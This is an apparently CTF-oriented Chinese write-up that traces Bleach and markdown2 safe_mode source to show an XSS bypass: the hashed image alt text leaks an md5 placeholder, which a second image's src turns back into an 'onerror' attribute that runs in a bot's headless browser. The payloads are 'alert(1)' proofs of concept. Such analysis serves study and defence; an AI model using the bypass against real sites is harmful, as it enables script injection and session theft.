Markdown 双哈希逃逸:Bleach 清洗后 markdown2 SafeMode 的 Alt 属性 XSS 完整链路:)
adoraki!!!!!!!!!!
就按照闲谈学习去完成这个吧,全链坐实
无容置疑的点只有两个,就是需要让markdown语法和js进行联系
以及让bot的无头浏览器执行我们的js
我们看代码片段
safe_md = bleach.clean( md, tags=[], attributes={}, protocols=[], strip=True, strip_comments=True, )直接进行追溯
这个函数传的参数很多都是默认的
def clean( text, tags=ALLOWED_TAGS,#[] attributes=ALLOWED_ATTRIBUTES,#{} protocols=ALLOWED_PROTOCOLS,#[] strip=False, strip_comments=True, css_sanitizer=None,):
cleaner = Cleaner( tags=tags, attributes=attributes, protocols=protocols, strip=strip, strip_comments=strip_comments, css_sanitizer=css_sanitizer, ) return cleaner.clean(text)继续跟
def clean(self, text): if not isinstance(text, str): message = ( f"argument cannot be of {text.__class__.__name__!r} type, " + "must be of text type" ) raise TypeError(message)
if not text: return ""
dom = self.parser.parseFragment(text)#text是的 filtered = BleachSanitizerFilter( source=self.walker(dom), allowed_tags=self.tags, attributes=self.attributes, strip_disallowed_tags=self.strip, strip_html_comments=self.strip_comments, css_sanitizer=self.css_sanitizer, allowed_protocols=self.protocols, )
# Apply any filters after the BleachSanitizerFilter for filter_class in self.filters: filtered = filter_class(source=filtered)
return self.serializer.render(filtered)其中parseFragment(text)是讲其解析为良好的树形结构,暂时不看
看看BleachSanitizerFilter
def sanitize_token(self, token): """Sanitize a token either by HTML-encoding or dropping.
Unlike sanitizer.Filter, allowed_attributes can be a dict of {'tag': ['attribute', 'pairs'], 'tag': callable}.
Here callable is a function with two arguments of attribute name and value. It should return true of false.
Also gives the option to strip tags instead of encoding.
:arg dict token: token to sanitize
:returns: token or list of tokens
""" token_type = token["type"] if token_type in ["StartTag", "EndTag", "EmptyTag"]: if token["name"] in self.allowed_tags: return self.allow_token(token)
elif self.strip_disallowed_tags: return None
else: return self.disallowed_token(token)
elif token_type == "Comment": if not self.strip_html_comments: # call lxml.sax.saxutils to escape &, <, and > in addition to " and ' token["data"] = html5lib_shim.escape( token["data"], entities={'"': """, "'": "'"} ) return token else: return None
elif token_type == "Characters": return self.sanitize_characters(token)
else: return token其实就是将html标签转为不支持的格式
然后直接转markdown,看看当markdown的safe标签的时候的过滤
html = Markup(markdown2.markdown(safe_md, safe_mode=“escape”))
def _sanitize_html(self, s: str) -> str: if self.safe_mode == "replace": return self.html_removed_text elif self.safe_mode == "escape": replacements = [ ('&', '&'), ('<', '<'), ('>', '>'), ] for before, after in replacements: s = s.replace(before, after) return s else: raise MarkdownError("invalid value for 'safe_mode': %r (must be " "'escape' or 'replace')" % self.safe_mode)
_inline_link_title = re.compile(r''' ( # \1 [ \t]+ (['"]) # quote char = \2 (?P<title>.*?) \2 )? # title is optional \)$ ''', re.X | re.S) _tail_of_reference_link_re = re.compile(r''' # Match tail of: [text][id] [ ]? # one optional space (?:\n[ ]*)? # one optional newline followed by spaces \[ (?P<id>[^\[\]]*?) \] ''', re.X | re.S)
_whitespace = re.compile(r'\s*')
_strip_anglebrackets = re.compile(r'<(.*)>.*')貌似核心不在这,我们回去跟text
在text最开始进markdown主函数的时候调用了convert
def convert(self, text: str) -> 'UnicodeWithAttrs': """Convert the given text.""" # Main function. The order in which other subs are called here is # essential. Link and image substitutions need to happen before # _EscapeSpecialChars(), so that any *'s or _'s in the <a> # and <img> tags get encoded.
# Clear the global hashes. If we don't clear these, you get conflicts # from other articles when generating a page which contains more than # one article (e.g. an index page that shows the N most recent # articles): self.reset()
if not isinstance(text, str): # TODO: perhaps shouldn't presume UTF-8 for string input? text = str(text, 'utf-8')
if self.use_file_vars: # Look for emacs-style file variable hints. text = self._emacs_oneliner_vars_pat.sub(self._emacs_vars_oneliner_sub, text) emacs_vars = self._get_emacs_vars(text) if "markdown-extras" in emacs_vars: splitter = re.compile("[ ,]+") for e in splitter.split(emacs_vars["markdown-extras"]): if '=' in e: ename, earg = e.split('=', 1) try: earg = int(earg) except ValueError: pass else: ename, earg = e, None self.extras[ename] = earg
self._setup_extras()
# Standardize line endings: text = text.replace("\r\n", "\n") text = text.replace("\r", "\n")
# Make sure $text ends with a couple of newlines: text += "\n\n"
# Convert all tabs to spaces. text = self._detab(text)
# Strip any lines consisting only of spaces and tabs. # This makes subsequent regexen easier to write, because we can # match consecutive blank lines with /\n+/ instead of something # contorted like /[ \t]*\n+/ . text = self._ws_only_line_re.sub("", text)
# strip metadata from head and extract if "metadata" in self.extras: text = self._extract_metadata(text)
text = self.preprocess(text)
if self.safe_mode: text = self._hash_html_spans(text)
# Turn block-level HTML blocks into hash entries text = self._hash_html_blocks(text, raw=True)
# Strip link definitions, store in hashes. if "footnotes" in self.extras: # Must do footnotes first because an unlucky footnote defn # looks like a link defn: # [^4]: this "looks like a link defn" text = self._strip_footnote_definitions(text) text = self._strip_link_definitions(text)
text = self._run_block_gamut(text)
if "footnotes" in self.extras: text = self._do_footnote_marker(text) text = self._add_footnotes(text)
text = self.postprocess(text)
text = self._unescape_special_chars(text)
text = self._unhash_html_spans(text) if self.safe_mode: # return the removed text warning to its markdown.py compatible form text = text.replace(self.html_removed_text, self.html_removed_text_compat)
do_target_blank_links = "target-blank-links" in self.extras do_nofollow_links = "nofollow" in self.extras
if do_target_blank_links and do_nofollow_links: text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="nofollow noopener" target="_blank"\2', text) elif do_target_blank_links: text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="noopener" target="_blank"\2', text) elif do_nofollow_links: text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="nofollow"\2', text)
if "toc" in self.extras and self._toc: if self.extras['header-ids'].get('mixed'): # TOC will only be out of order if mixed headers is enabled def toc_sort(entry): '''Sort the TOC by order of appearance in text''' match = re.search( # header tag, any attrs, the ID, any attrs, the text, close tag r'^<(h%d).*?id=(["\'])%s\2.*>%s</\1>$' % (entry[0], entry[1], re.escape(entry[2])), text, re.M ) return match.start() if match else 0
self._toc.sort(key=toc_sort) self._toc_html = calculate_toc_html(self._toc)
# Prepend toc html to output if self.cli or (self.extras['toc'] is not None and self.extras['toc'].get('prepend', False)): text = f'{self._toc_html}\n{text}'
text += "\n"
# Attach attrs to output rv = UnicodeWithAttrs(text)
if "toc" in self.extras and self._toc: rv.toc_html = self._toc_html
if "metadata" in self.extras: rv.metadata = self.metadata return rv这一段是没有校验其他字段的
if self.safe_mode: text = self._hash_html_spans(text)
# Turn block-level HTML blocks into hash entries text = self._hash_html_blocks(text, raw=True)
# Strip link definitions, store in hashes.
text = self._strip_link_definitions(text)
text = self._run_block_gamut(text)
text = self.postprocess(text)
text = self._unescape_special_chars(text)
text = self._unhash_html_spans(text)先看看_hash_html_spans
因为比较长,只截回调那一部分,也就是非函数而是调用的部分
code_hashes = {} text = self._code_span_re.sub( lambda m: self._hash_span(m.string[m.start(): m.end()], code_hashes), text )因为md是reset的新状态,那么当_code_span_re这个正则被匹配的时候就会进行hash_span回调,
继续追溯
_code_span_re = re.compile(r''' (?<!\\) (`+) # \1 = Opening run of ` (?!`) # See Note A test/tm-cases/escapes.text (.+?) # \2 = The code block (?<!`) \1 # Matching closer (?!`) ''', re.X | re.S)def _hash_span(self, text: str, hash_table: Optional[dict] = None) -> str: ''' Wrapper around `_hash_text` that also adds the hash to `self.hash_spans`, meaning it will be automatically unhashed during conversion.
Args: text: the text to hash hash_table: the dict to insert the hash into. If omitted will default to `self.html_spans`
Returns: The hashed text ''' key = _hash_text(text) if hash_table is not None: hash_table[key] = text else: self.html_spans[key] = text return key跟hash
def _hash_text(s: str) -> str: return 'md5-' + sha256(SECRET_SALT + s.encode("utf-8")).hexdigest()[32:]
# Table of hash values for escaped characters:g_escape_table = {ch: _hash_text(ch) for ch in '\\`*_{}[]()>#+-.!'}
# Ampersand-encoding based entirely on Nat Irons's Amputator MT plugin:# http://bumppo.net/projects/amputator/_AMPERSAND_BODY_RE = r'#?[xX]?(?:[0-9a-fA-F]+|\w+);'_AMPERSAND_RE = re.compile(r'&(?!%s)' % _AMPERSAND_BODY_RE)_ESCAPED_AMPERSAND_RE = re.compile(r'(?:\\\\)*\\&(%s)' % _AMPERSAND_BODY_RE)这里转hash,然后就是正常的图片转img标签。然后就是_unescape_special_chars
def _unescape_special_chars(self, text: str) -> str: # Swap back in all the special characters we've hidden. hashmap = tuple(self._escape_table.items()) + tuple(self._code_table.items()) # html_blocks table is in format {hash: item} compared to usual {item: hash} hashmap += tuple(tuple(reversed(i)) for i in self.html_blocks.items()) while True: orig_text = text for ch, hash in hashmap: text = text.replace(hash, ch) if text == orig_text: break return text它用元组将hash换了回来
也就是一个md5对应的原本代码
在这里需要先明确
md的语法,也就是
这里的x是alt属性,y是src
但是有一点,它转hash转回来的时候只换了src,并没有换alt标签的东西,
所以alt的md5就会被直接泄露出来
result = ( f'<img src="..."' f' alt="{self.md._hash_span(_xml_escape_attr(link_text))}"' # ← 这里! ...)并且因为clean的缘故没法插入html标签
所以执行这个分两步
![`" onerror="alert(1)//`]()这个的" onerror="alert(1)//因为是alt标签,所以直接被转换为md5填充回来但是不会被替换
而REPLACEME//这一部分是src,它的md5最后会
orig_text = text for ch, hash in hashmap: text = text.replace(hash, ch) if text == orig_text: break return text也就是转回来,并且这个md5是循环的,也就是说会直到无法转为止才会返回
如果说为啥不直接将这个放到()里,那是因为safe的模块会转义"",”等等内容
所以我们先用
![`" onerror="alert(1)//`]()将恶意代码的md5泄露出来,再二次填入REPLACEME//的这个地方
所以第二次是
![`" onerror="alert(1)//`]()这样经过循环后md5就会被二次转为恶意代码,并且“包裹也就是
<img src="code>" onerror="alert(1)////</code" alt="a" ... />极其巧妙的截断
完结
部分信息可能已经过时





